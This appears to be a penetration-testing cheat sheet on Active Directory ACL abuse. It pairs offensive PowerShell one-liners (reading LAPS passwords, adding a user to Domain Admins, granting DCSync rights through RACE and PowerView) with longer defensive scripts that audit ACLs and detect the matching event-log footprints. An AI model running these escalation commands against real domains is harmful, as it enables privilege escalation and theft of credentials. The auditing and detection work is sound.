ACL Abuse

Enumerate interesting ACLs

ADModule:
# Import the ActiveDirectory module from a copied DLL/PSD1 (no RSAT install needed)
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get the DistinguishedName of the user
Get-ADUser -Identity USER
# List the ACEs on that user object (which principals hold which rights over it)
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access

PowerView_Dev:
# Find ACEs granting modification rights to non-privileged principals, with GUIDs resolved to names
Find-InterestingDomainACL -ResolveGUIDs

PowerView:
Invoke-ACLScanner -ResolveGUIDs
When a resolved GUID in the output points at the LAPS password attribute of an OU, it is most likely LAPS: the principal named in IdentityReferenceName can read the LAPS local administrator password in cleartext for the computers in that OU.
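The same enumeration can be run from the defender's side to find out who holds these rights before anyone else does. The following script is an added example, not code from the original page or from the ADModule/PowerView projects: it walks the objects under a search base with the ActiveDirectory module's AD: drive, resolves ObjectType GUIDs itself from the schema and the Extended-Rights container (so LAPS attribute reads and the DCSync replication rights show up by name), and reports Allow ACEs with modification or extended rights held by principals outside the expected administrative set. $SearchBase and the $ExpectedPrincipal pattern are assumptions to tune for the environment.

```powershell
# Added example (not from the original page): audit the ACLs under a search base for
# rights that enable the abuses listed here, from the defender's side. Assumes the
# ActiveDirectory module (and its AD: drive) is available; $SearchBase is a placeholder.
Import-Module ActiveDirectory

$SearchBase = 'DC=techcorp,DC=local'   # placeholder: the domain or OU to audit

# Build a GUID -> name map from the schema (attributes/classes) and the
# Extended-Rights container (control access rights such as the DCSync pair),
# so ObjectType GUIDs in ACEs can be read without -ResolveGUIDs.
$RootDse = Get-ADRootDSE
$GuidMap = @{}
Get-ADObject -SearchBase $RootDse.schemaNamingContext -LDAPFilter '(schemaIDGUID=*)' `
    -Properties name, schemaIDGUID |
    ForEach-Object { $GuidMap[(New-Object Guid (,[byte[]]$_.schemaIDGUID)).Guid] = $_.name }
Get-ADObject -SearchBase "CN=Extended-Rights,$($RootDse.configurationNamingContext)" `
    -LDAPFilter '(objectClass=controlAccessRight)' -Properties name, rightsGUID |
    ForEach-Object { $GuidMap[([guid]$_.rightsGUID).Guid] = $_.name }

# Rights worth a second look when held by a principal that is not already privileged.
$DangerousRights = 'GenericAll', 'WriteDacl', 'WriteOwner', 'WriteProperty', 'ExtendedRight', 'Self'
# Principals expected to hold such rights (assumed list; tune to the environment).
$ExpectedPrincipal = '^(NT AUTHORITY|BUILTIN)\\|\\(Domain Admins|Enterprise Admins|Domain Controllers|Enterprise Domain Controllers|Administrators)$'

function Find-RiskyAce {
    param([string]$Base)
    foreach ($obj in Get-ADObject -SearchBase $Base -SearchScope Subtree -Filter *) {
        # Some DNs contain characters the AD: provider cannot path; skip those objects.
        try { $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)" } catch { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $who = $ace.IdentityReference.Value
            if ($who -match $ExpectedPrincipal) { continue }
            $rights = $ace.ActiveDirectoryRights.ToString()
            if (-not ($DangerousRights | Where-Object { $rights -match $_ })) { continue }
            # An empty ObjectType means the right applies to the whole object.
            $type = $ace.ObjectType.Guid
            $typeName = if ($type -eq [guid]::Empty.Guid) { 'All' }
                        elseif ($GuidMap.ContainsKey($type)) { $GuidMap[$type] }
                        else { $type }
            [pscustomobject]@{
                Object     = $obj.DistinguishedName
                Principal  = $who
                Rights     = $rights
                ObjectType = $typeName   # e.g. ms-Mcs-AdmPwd (LAPS read) or DS-Replication-Get-Changes-All
                Inherited  = $ace.IsInherited
            }
        }
    }
}

Find-RiskyAce -Base $SearchBase | Sort-Object Object | Format-Table -AutoSize
```

Reading every security descriptor in a domain takes a while; start with a single OU. Inherited ACEs repeat on every child object, so the Inherited column is the first thing to filter on when the same principal shows up hundreds of times.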
LAPS Module:
# Import the LAPS PowerShell module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find which principals hold the extended rights (can read LAPS passwords) on an OU
Find-AdmPwdExtendedRights -Identity <OU>
# Once a user that can read LAPS has been compromised, read a machine's password
Get-AdmPwdPassword -ComputerName <targetmachine>
Can add members to the group

ADModule:
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check
Get-ADGroupMember -Identity "LocalAdmins"

PowerView_dev:
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
Can perform Resource Based Constrained Delegation Attack
Can reset their password without knowing the old one
Can give DCSync privs to user

RACE:
# Grant the DCSync replication rights on the domain object to USER (placeholder SamAccountName)
Set-ADACL -SamAccountName USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

PowerView3:
# The target object is the domain DN; the principal receiving the rights is USER
Add-DomainObjectAcl -TargetIdentity 'DC=techcorp,DC=local' -PrincipalIdentity USER -Rights DCSync
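Each of the abuses in the sections above (group membership changes, password resets, ACL edits that grant DCSync, and the replication itself) leaves a distinct event on the domain controller. The script below is an added example, not code from the original page or from RACE/PowerView: it pulls those events from a DC's Security log with Get-WinEvent and flags a 4662 carrying a replication control access right from anything that is not a machine account, member additions (4728/4732/4756), password resets (4724), and nTSecurityDescriptor changes (5136). It assumes the Directory Service Access, Directory Service Changes and Account Management audit subcategories are enabled and that a SACL exists on the domain object; $Computer and $LookBack are placeholders.

```powershell
# Added example (not from the original page): look for the footprints of the abuses on
# this page in a domain controller's Security log. Assumes the relevant audit
# subcategories are enabled; $Computer and $LookBack are placeholders.
$Computer = 'DC01'                         # placeholder domain controller
$LookBack = (Get-Date).AddHours(-24)

# Control access rights that together mean "replicate the directory" (DCSync).
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'   # DS-Replication-Get-Changes-In-Filtered-Set
)

function ConvertFrom-EventData {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Record)
    # Flatten <EventData><Data Name="..."> of a record into a hashtable.
    $map = @{}
    foreach ($d in ([xml]$Record.ToXml()).Event.EventData.Data) { $map[$d.Name] = $d.'#text' }
    return $map
}

function Get-Events {
    param([int[]]$Id)
    Get-WinEvent -ComputerName $Computer -ErrorAction SilentlyContinue `
        -FilterHashtable @{ LogName = 'Security'; Id = $Id; StartTime = $LookBack }
}

function Find-AclAbuseEvents {
    # 1) DCSync: 4662 whose Properties list a replication right, requested by
    #    something other than a domain controller's machine account (which ends in '$').
    foreach ($e in Get-Events -Id 4662) {
        $d = ConvertFrom-EventData $e
        $hit = $ReplicationGuids | Where-Object { $d['Properties'] -match $_ }
        if ($hit -and $d['SubjectUserName'] -notmatch '\$$') {
            [pscustomobject]@{ Time = $e.TimeCreated; Alert = 'Possible DCSync'
                               Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                               Detail = ($hit -join ', ') }
        }
    }
    # 2) Member added to a global (4728), local (4732) or universal (4756) group.
    foreach ($e in Get-Events -Id 4728, 4732, 4756) {
        $d = ConvertFrom-EventData $e
        [pscustomobject]@{ Time = $e.TimeCreated; Alert = 'Group member added'
                           Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                           Detail = "$($d['MemberName']) -> $($d['TargetUserName'])" }
    }
    # 3) Password reset by another account (4724); check the subject was meant to do it.
    foreach ($e in Get-Events -Id 4724) {
        $d = ConvertFrom-EventData $e
        [pscustomobject]@{ Time = $e.TimeCreated; Alert = 'Password reset'
                           Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                           Detail = "reset password of $($d['TargetDomainName'])\$($d['TargetUserName'])" }
    }
    # 4) Security descriptor rewritten on a directory object (5136 on nTSecurityDescriptor):
    #    this is how DCSync/ResetPassword/WriteMembers rights get granted.
    foreach ($e in Get-Events -Id 5136) {
        $d = ConvertFrom-EventData $e
        if ($d['AttributeLDAPDisplayName'] -eq 'nTSecurityDescriptor') {
            [pscustomobject]@{ Time = $e.TimeCreated; Alert = 'ACL modified'
                               Subject = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                               Detail = "ACL of $($d['ObjectDN']) changed" }
        }
    }
}

Find-AclAbuseEvents | Sort-Object Time | Format-Table -AutoSize
```

4662 is noisy, which is why the filter keys on the replication GUIDs in the Properties field rather than on the event id alone; legitimate replication comes from DC machine accounts, so a human-looking SubjectUserName with those GUIDs is the thing to chase. 5136 only fires for objects whose SACL audits writes, so confirm the domain object's SACL before trusting an empty result for the ACL-modified category.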